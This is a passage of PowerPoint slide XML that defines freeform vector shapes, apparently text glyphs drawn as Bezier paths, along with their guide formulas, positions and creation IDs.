                <a:gd name="T15" fmla="*/ 243 h 498"/>
                <a:gd name="T16" fmla="*/ 0 w 177"/>
                <a:gd name="T17" fmla="*/ 249 h 498"/>
                <a:gd name="T18" fmla="*/ 8 w 177"/>
                <a:gd name="T19" fmla="*/ 254 h 498"/>
                <a:gd name="T20" fmla="*/ 70 w 177"/>
                <a:gd name="T21" fmla="*/ 299 h 498"/>
                <a:gd name="T22" fmla="*/ 71 w 177"/>
                <a:gd name="T23" fmla="*/ 323 h 498"/>
                <a:gd name="T24" fmla="*/ 71 w 177"/>
                <a:gd name="T25" fmla="*/ 422 h 498"/>
                <a:gd name="T26" fmla="*/ 95 w 177"/>
                <a:gd name="T27" fmla="*/ 478 h 498"/>
                <a:gd name="T28" fmla="*/ 167 w 177"/>
                <a:gd name="T29" fmla="*/ 498 h 498"/>
                <a:gd name="T30" fmla="*/ 177 w 177"/>
                <a:gd name="T31" fmla="*/ 493 h 498"/>
                <a:gd name="T32" fmla="*/ 169 w 177"/>
                <a:gd name="T33" fmla="*/ 487 h 498"/>
                <a:gd name="T34" fmla="*/ 106 w 177"/>
                <a:gd name="T35" fmla="*/ 444 h 498"/>
                <a:gd name="T36" fmla="*/ 105 w 177"/>
                <a:gd name="T37" fmla="*/ 420 h 498"/>
                <a:gd name="T38" fmla="*/ 105 w 177"/>
                <a:gd name="T39" fmla="*/ 316 h 498"/>
                <a:gd name="T40" fmla="*/ 85 w 177"/>
                <a:gd name="T41" fmla="*/ 268 h 498"/>
                <a:gd name="T42" fmla="*/ 46 w 177"/>
                <a:gd name="T43" fmla="*/ 249 h 498"/>
                <a:gd name="T44" fmla="*/ 105 w 177"/>
                <a:gd name="T45" fmla="*/ 186 h 498"/>
                <a:gd name="T46" fmla="*/ 105 w 177"/>
                <a:gd name="T47" fmla="*/ 66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7" h="498">
                  <a:moveTo>
                    <a:pt x="105" y="66"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="46"/>
                    <a:pt x="118" y="14"/>
                    <a:pt x="172" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="10"/>
                    <a:pt x="177" y="8"/>
                    <a:pt x="177" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="167" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="0"/>
                    <a:pt x="72" y="25"/>
                    <a:pt x="71" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71" y="176"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="195"/>
                    <a:pt x="71" y="211"/>
                    <a:pt x="51" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="242"/>
                    <a:pt x="15" y="243"/>
                    <a:pt x="4" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="244"/>
                    <a:pt x="0" y="246"/>
                    <a:pt x="0" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="254"/>
                    <a:pt x="3" y="254"/>
                    <a:pt x="8" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="256"/>
                    <a:pt x="64" y="274"/>
                    <a:pt x="70" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="304"/>
                    <a:pt x="71" y="305"/>
                    <a:pt x="71" y="323"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71" y="422"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="443"/>
                    <a:pt x="71" y="459"/>
                    <a:pt x="95" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="493"/>
                    <a:pt x="148" y="498"/>
                    <a:pt x="167" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="498"/>
                    <a:pt x="177" y="498"/>
                    <a:pt x="177" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="488"/>
                    <a:pt x="174" y="488"/>
                    <a:pt x="169" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="485"/>
                    <a:pt x="113" y="469"/>
                    <a:pt x="106" y="444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="439"/>
                    <a:pt x="105" y="438"/>
                    <a:pt x="105" y="420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="316"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="293"/>
                    <a:pt x="101" y="284"/>
                    <a:pt x="85" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="258"/>
                    <a:pt x="60" y="253"/>
                    <a:pt x="46" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="237"/>
                    <a:pt x="105" y="214"/>
                    <a:pt x="105" y="186"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="6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18" name="Freeform 859">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C2C21B5-C0CC-4673-9FF2-283A21499D07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId35"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2997201" y="1897063"/>
              <a:ext cx="46038" cy="52388"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 135"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 28 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 130 h 147"/>
                <a:gd name="T12" fmla="*/ 45 w 135"/>
                <a:gd name="T13" fmla="*/ 28 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 28 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 89 w 135"/>
                <a:gd name="T19" fmla="*/ 28 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 130 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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147">
                  <a:moveTo>
                    <a:pt x="45" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="89" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="130"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134"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19" name="Rectangle 860">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1269804B-2954-4FB4-BF50-6376F9BBB5B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId36"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3065463" y="2027238"/>
              <a:ext cx="180975" cy="6350"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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20" name="Freeform 861">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C63B014-D1B7-4A02-96AD-E70D7F3C02B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId37"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3255963" y="1928813"/>
              <a:ext cx="69850" cy="79375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 223"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 223"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 168 w 204"/>
                <a:gd name="T27" fmla="*/ 94 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 94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3">
                  <a:moveTo>
                    <a:pt x="184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="223"/>
                    <a:pt x="114" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="31"/>
                    <a:pt x="107" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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21" name="Freeform 862">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E136243F-780D-4315-8974-E1BDDA91CC88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId38"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3346451" y="1898651"/>
              <a:ext cx="69850" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 20 h 305"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 20 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 15 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 30 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 30 h 305"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 274 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 204"/>
                <a:gd name="T15" fmla="*/ 274 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 274 h 305"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 274 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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305">
                  <a:moveTo>
                    <a:pt x="119" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="274"/>
                    <a:pt x="192" y="274"/>
                    <a:pt x="184" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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22" name="Freeform 863">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EDF56D1-BD25-48EB-B744-67A62DBEC2BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId39"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3432176" y="1928813"/>
              <a:ext cx="82550" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 239"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
                <a:gd name="T4" fmla="*/ 102 w 239"/>
                <a:gd name="T5" fmla="*/ 33 h 335"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 239"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 239"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 31 h 335"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 239"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 205 h 335"/>
                <a:gd name="T46" fmla="*/ 125 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 227 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 239"/>
                <a:gd name="T65" fmla="*/ 219 h 335"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="33"/>
                    <a:pt x="102" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="33"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="127" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="42"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="150" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="124" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="25" y="149"/>
                    <a:pt x="25" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="335"/>
                    <a:pt x="116" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="125" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="219"/>
                    <a:pt x="66" y="219"/>
                    <a:pt x="103" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="219"/>
                    <a:pt x="203" y="219"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="116" y="30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23" name="Freeform 864">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{612E20B4-FA27-4E49-9B2E-5909759D6593}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId40"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3521076" y="1928813"/>
              <a:ext cx="84138" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 102 w 240"/>
                <a:gd name="T1" fmla="*/ 133 h 335"/>
                <a:gd name="T2" fmla="*/ 54 w 240"/>
                <a:gd name="T3" fmla="*/ 83 h 335"/>
